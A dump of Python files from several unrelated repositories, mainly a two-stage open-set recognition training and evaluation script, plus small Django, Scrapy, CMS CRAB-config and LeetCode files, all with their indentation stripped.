'distance': {'thresholds': torch.ones(args.train_class_num)},
'stat': None,
'net': None
}
if not args.evaluate and not os.path.isfile(args.stage2_resume):
stage1_dict = main_stage1()
main_stage2(stage1_dict)
# centroids = cal_centroids(net1, device)
# main_stage2(net1, centroids)
def main_stage1():
print(f"\nStart Stage-1 training ...\n")
# for initializing backbone, two branches, and centroids.
start_epoch = 0 # start from epoch 0 or last checkpoint epoch
# Model
print('==> Building model..')
net = DFPNet(backbone=args.arch, num_classes=args.train_class_num, embed_dim=args.embed_dim,
distance=args.distance, similarity=args.similarity, scaled=args.scaled,
norm_centroid=args.norm_centroid, decorrelation=args.decorrelation)
net = net.to(device)
if device == 'cuda':
net = torch.nn.DataParallel(net)
cudnn.benchmark = True
if args.stage1_resume:
# Load checkpoint.
if os.path.isfile(args.stage1_resume):
print('==> Resuming from checkpoint..')
checkpoint = torch.load(args.stage1_resume)
net.load_state_dict(checkpoint['net'])
start_epoch = checkpoint['epoch']
logger = Logger(os.path.join(args.checkpoint, 'log_stage1.txt'), resume=True)
else:
print("=> no checkpoint found at '{}'".format(args.resume))
else:
logger = Logger(os.path.join(args.checkpoint, 'log_stage1.txt'))
logger.set_names(['Epoch', 'Train Loss', 'Similarity Loss', 'Distance Loss', 'Train Acc.'])
# after resume
criterion = DFPLoss(alpha=args.alpha)
optimizer = optim.SGD(net.parameters(), lr=args.stage1_lr, momentum=0.9, weight_decay=5e-4)
for epoch in range(start_epoch, args.stage1_es):
adjust_learning_rate(optimizer, epoch, args.stage1_lr, step=20)
print('\nStage_1 Epoch: %d | Learning rate: %f ' % (epoch + 1, optimizer.param_groups[0]['lr']))
train_out = stage1_train(net, trainloader, optimizer, criterion, device)
save_model(net, epoch, os.path.join(args.checkpoint, 'stage_1_last_model.pth'))
logger.append([epoch + 1, train_out["train_loss"], train_out["loss_similarity"],
train_out["loss_distance"], train_out["accuracy"]])
# calculating distances for last epoch
distance_results = plot_distance(net, trainloader, device, args)
# print(f"the distance thresholds are\n {distance_results['thresholds']}\n")
# gap_results = plot_gap(net, trainloader, device, args)
# stat = get_gap_stat(net, trainloader, device, args)
# estimator =CGD_estimator(gap_results)
logger.close()
print(f"\nFinish Stage-1 training...\n")
print("===> Evaluating ...")
stage1_test(net, testloader, device)
return {"net": net,
"distance": distance_results,
# "stat": stat
}
# Training
def stage1_train(net, trainloader, optimizer, criterion, device):
net.train()
train_loss = 0
loss_similarity = 0
loss_distance = 0
correct = 0
total = 0
for batch_idx, (inputs, targets) in enumerate(trainloader):
inputs, targets = inputs.to(device), targets.to(device)
optimizer.zero_grad()
out = net(inputs)
loss_dict = criterion(out, targets)
loss = loss_dict['total']
# loss = loss_dict['similarity']
# loss = loss_dict['distance']
loss.backward()
optimizer.step()
train_loss += loss.item()
loss_similarity += (loss_dict['similarity']).item()
loss_distance += (loss_dict['distance']).item()
_, predicted = (out['sim_fea2cen']).max(1)
total += targets.size(0)
correct += predicted.eq(targets).sum().item()
progress_bar(batch_idx, len(trainloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'
% (train_loss / (batch_idx + 1), 100. * correct / total, correct, total))
return {
"train_loss": train_loss / (batch_idx + 1),
"loss_similarity": loss_similarity / (batch_idx + 1),
"loss_distance": loss_distance / (batch_idx + 1),
"accuracy": correct / total
}
def stage1_test(net, testloader, device):
correct = 0
total = 0
with torch.no_grad():
for batch_idx, (inputs, targets) in enumerate(testloader):
inputs, targets = inputs.to(device), targets.to(device)
out = net(inputs)
_, predicted = (out["sim_fea2cen"]).max(1)
total += targets.size(0)
correct += predicted.eq(targets).sum().item()
progress_bar(batch_idx, len(testloader), '| Acc: %.3f%% (%d/%d)'
% (100. * correct / total, correct, total))
print("\nTesting results is {:.2f}%".format(100. * correct / total))
def main_stage2(stage1_dict):
print('==> Building stage2 model..')
start_epoch = 0 # start from epoch 0 or last checkpoint epoch
net = DFPNet(backbone=args.arch, num_classes=args.train_class_num, embed_dim=args.embed_dim,
distance=args.distance, similarity=args.similarity, scaled=args.scaled,
norm_centroid=args.norm_centroid, decorrelation=args.decorrelation)
net = net.to(device)
if device == 'cuda':
net = torch.nn.DataParallel(net)
cudnn.benchmark = True
if not args.evaluate and not os.path.isfile(args.stage2_resume):
net = stage1_dict['net']
net = net.to(device)
thresholds = stage1_dict['distance']['thresholds']
# stat = stage1_dict["stat"]
net.module.set_threshold(thresholds.to(device))
if args.stage2_resume:
# Load checkpoint.
if os.path.isfile(args.stage2_resume):
print('==> Resuming from checkpoint..')
checkpoint = torch.load(args.stage2_resume)
net.load_state_dict(checkpoint['net'])
start_epoch = checkpoint['epoch']
try:
thresholds = checkpoint['net']['thresholds']
except:
thresholds = checkpoint['net']['module.thresholds']
net.module.set_threshold(thresholds.to(device))
logger = Logger(os.path.join(args.checkpoint, 'log_stage2.txt'), resume=True)
else:
print("=> no checkpoint found at '{}'".format(args.resume))
else:
logger = Logger(os.path.join(args.checkpoint, 'log_stage2.txt'))
logger.set_names(['Epoch', 'Train Loss', 'Similarity Loss', 'Distance in', 'Distance out',
'Distance Center', 'Train Acc.'])
if args.evaluate:
stage2_test(net, testloader, device)
return net
# after resume
    criterion = DFPLoss2(alpha=args.alpha, beta=args.beta, theta=args.theta)
    optimizer = optim.SGD(net.parameters(), lr=args.stage2_lr, momentum=0.9, weight_decay=5e-4)
for epoch in range(start_epoch, args.stage2_es):
print('\nStage_2 Epoch: %d Learning rate: %f' % (epoch + 1, optimizer.param_groups[0]['lr']))
# Here, I didn't set optimizers respectively, just for simplicity. Performance did not vary a lot.
adjust_learning_rate(optimizer, epoch, args.stage2_lr, step=20)
# if epoch %5 ==0:
# distance_results = plot_distance(net, trainloader, device, args)
# thresholds = distance_results['thresholds']
# net.module.set_threshold(thresholds.to(device))
train_out = stage2_train(net, trainloader, optimizer, criterion, device)
save_model(net, epoch, os.path.join(args.checkpoint, 'stage_2_last_model.pth'))
stage2_test(net, testloader, device)
# stat = get_gap_stat(net2, trainloader, device, args)
logger.append([epoch + 1, train_out["train_loss"], train_out["loss_similarity"],
train_out["distance_in"], train_out["distance_out"],
train_out["distance_center"], train_out["accuracy"]])
print(f"\nFinish Stage-2 training...\n")
logger.close()
stage2_test(net, testloader, device)
return net
def stage2_train(net2, trainloader, optimizer, criterion, device):
net2.train()
train_loss = 0
loss_similarity = 0
distance_in = 0
distance_out = 0
distance_center = 0
correct = 0
total = 0
for batch_idx, (inputs, targets) in enumerate(trainloader):
inputs, targets = inputs.to(device), targets.to(device)
optimizer.zero_grad()
out = net2(inputs)
loss_dict = criterion(out, targets)
loss = loss_dict['total']
# loss = loss_dict['similarity']
# loss = loss_dict['distance']
loss.backward()
optimizer.step()
train_loss += loss.item()
loss_similarity += (loss_dict['similarity']).item()
distance_in += (loss_dict['distance_in']).item()
distance_out += (loss_dict['distance_out']).item()
distance_center += (loss_dict['distance_center']).item()
_, predicted = (out['sim_fea2cen']).max(1)
total += targets.size(0)
correct += predicted.eq(targets).sum().item()
progress_bar(batch_idx, len(trainloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'
% (train_loss / (batch_idx + 1), 100. * correct / total, correct, total))
return {
"train_loss": train_loss / (batch_idx + 1),
"loss_similarity": loss_similarity / (batch_idx + 1),
"distance_in": distance_in / (batch_idx + 1),
"distance_out": distance_out / (batch_idx + 1),
"distance_center": distance_center / (batch_idx + 1),
"accuracy": correct / total
}
def save_model(net, epoch, path, **kwargs):
state = {
'net': net.state_dict(),
'epoch': epoch,
}
for key, value in kwargs.items():
state[key] = value
torch.save(state, path)
def stage2_test(net, testloader, device):
sim_list, dis_list, target_list = [], [], []
threshold = 0
with torch.no_grad():
for batch_idx, (inputs, targets) in enumerate(testloader):
inputs, targets = inputs.to(device), targets.to(device)
out = net(inputs)
threshold = out["thresholds"] # [class]
sim_fea2cen= out["sim_fea2cen"] # [batch,class]
sim_fea2cen = torch.softmax(sim_fea2cen,dim=1) # [batch,class]
dis_fea2cen= out["dis_fea2cen"] # [batch,class]
sim_list.append(sim_fea2cen)
dis_list.append(dis_fea2cen)
target_list.append(targets)
progress_bar(batch_idx, len(testloader))
sim_list = torch.cat(sim_list,dim=0)
dis_list = torch.cat(dis_list,dim=0)
target_list = torch.cat(target_list, dim=0)
    detail_evaluate(sim_list, dis_list, target_list, threshold)
def detail_evaluate(sim_list, dis_list, target_list, threshold):
predicts = []
labels = []
c = sim_list.shape[1]
# print(c)
for i in range(target_list.shape[0]):
sim, dis, target = sim_list[i], dis_list[i], target_list[i]
sim_value, sim_ind = sim.max(0)
dis_value, dis_ind = dis.min(0)
if sim_value < args.sim_threshold or dis_value >args.amplier*threshold[dis_ind]:
# if sim_value < args.sim_threshold:
predict = c
else:
predict = sim_ind.item()
predicts.append(predict)
labels.append(target.item())
# print(f"sim_value{sim_value}\t predict{predict}\t target{target}\t dis_value{dis_value}\t")
    eval_result = Evaluation(predicts, labels, sim_list.tolist())
    print("accuracy is %.3f" % eval_result.accuracy)
    print("F1 is %.3f" % eval_result.f1_measure)
    print("f1_macro is %.3f" % eval_result.f1_macro)
    print("f1_macro_weighted is %.3f" % eval_result.f1_macro_weighted)
    print("area_under_roc is %.3f" % eval_result.area_under_roc)
# eval_result = Evaluation(pred_list, target_list, score_list)
#
# torch.save(eval_result, os.path.join(args.checkpoint, 'eval.pkl'))
#
# print(f"accuracy is %.3f" % (eval_result.accuracy))
# print(f"F1 is %.3f" % (eval_result.f1_measure))
# print(f"f1_macro is %.3f" % (eval_result.f1_macro))
# print(f"f1_macro_weighted is %.3f" % (eval_result.f1_macro_weighted))
# print(f"area_under_roc is %.3f" % (eval_result.area_under_roc))
# print(f"confuse matrix unkown is {eval_result.confusion_matrix[:,-1]}")
if __name__ == '__main__':
main()
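# Hedged invocation sketch (flag values are examples, not prescriptions):
#
#   python cifar100.py --train_class_num 50 --test_class_num 100 \
#       --arch ResNet18 --bs 256 --stage1_es 50 --stage2_es 50
#
# Passing --evaluate together with --stage2_resume <checkpoint> skips training
# and only runs the open-set evaluation.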
# ---- /nao_vacila/wsgi.py (repo: kallebefelipe/webserver-nao-vacila) ----
"""
WSGI config for nao_vacila project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
from whitenoise.django import DjangoWhiteNoise
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "nao_vacila.settings")
application = get_wsgi_application()
application = DjangoWhiteNoise(application)
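# Hedged usage note (assumption, not in the original file): a WSGI server
# imports this module's `application`, e.g.
#
#   gunicorn nao_vacila.wsgi:application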
# ---- /web_scraping/rhiphopheads/items.py (repo: luke-zhu/cs1951a-data) ----
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class RhiphopheadsItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
pass
# ---- /blog/migrations/0037_reviewimage_thumbnail.py (repo: CCCodes/ProConDuck) ----
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-08-23 00:31
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0036_auto_20170822_0803'),
]
operations = [
migrations.AddField(
model_name='reviewimage',
name='thumbnail',
field=models.BooleanField(default=False),
),
]
# ---- /private_production/eft/2018/crab_INT_MINIAODSIM.py (repo: UniMiBAnalyses/CMSSWGeneration) ----
from CRABClient.UserUtilities import config, getUsernameFromSiteDB
config = config()
config.General.requestName = 'VBS_SSWW_INT_MINIAODSIM'
config.General.workArea = 'crab_projects'
config.General.transferOutputs = True
config.General.transferLogs = False
config.JobType.pluginName = 'Analysis'
config.JobType.psetName = 'SMP-RunIIAutumn18MiniAOD-00048_1_cfg.py'
config.JobType.numCores = 4
config.JobType.maxMemoryMB = 6000
config.Data.inputDataset = '/Bulk/jixiao-VBS_SSWW_INT_Premix_2-7c74ac161ee1f5c5534fed7a9685e204/USER'
config.Data.inputDBS = 'phys03'
config.Data.splitting = 'FileBased'
config.Data.unitsPerJob = 1
config.Data.outLFNDirBase = '/store/user/%s/eft2018' % (getUsernameFromSiteDB())
config.Data.publication = True
config.Data.outputDatasetTag = 'VBS_SSWW_INT_MINIAODSIM'
config.Site.storageSite = 'T2_CN_Beijing'
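# Hedged usage note (assumption): with a valid grid proxy, this configuration
# is submitted through the CRAB client, e.g.
#
#   crab submit -c crab_INT_MINIAODSIM.py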
# ---- /todo_project/todo_app/models.py (repo: DeanDupalov/Front-End-Basics) ----
from django.db import models
# Create your models here.
class Todo(models.Model):
title = models.CharField(max_length=10)
description = models.TextField(max_length=100)
is_done = models.BooleanField(default=False)
def __str__(self):
return self.title
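# Hedged usage sketch (values are examples; note title is capped at 10 chars):
#
#   todo = Todo.objects.create(title='Dishes', description='Wash after dinner')
#   todo.is_done = True
#   todo.save()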
# ---- /504. Base 7/solution.py (repo: huangruihaocst/leetcode-python) ----
class Solution(object):
def convertToBase7(self, num):
"""
:type num: int
:rtype: str
"""
if -6 <= num <= 6:
return str(num)
def helper(n): # n >= 7
li = list()
while n >= 7:
li.append(n % 7)
n //= 7
li.append(n)
return ''.join(map(str, li[::-1]))
if num >= 0:
return helper(num)
else:
return '-' + helper(-num)
if __name__ == '__main__':
s = Solution()
print(s.convertToBase7(-7))
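# Hedged sanity check (added for illustration): Python's int() inverts the
# conversion, so int(s.convertToBase7(n), 7) == n for any n, e.g.
#   assert int(s.convertToBase7(-7), 7) == -7
#   assert int(s.convertToBase7(100), 7) == 100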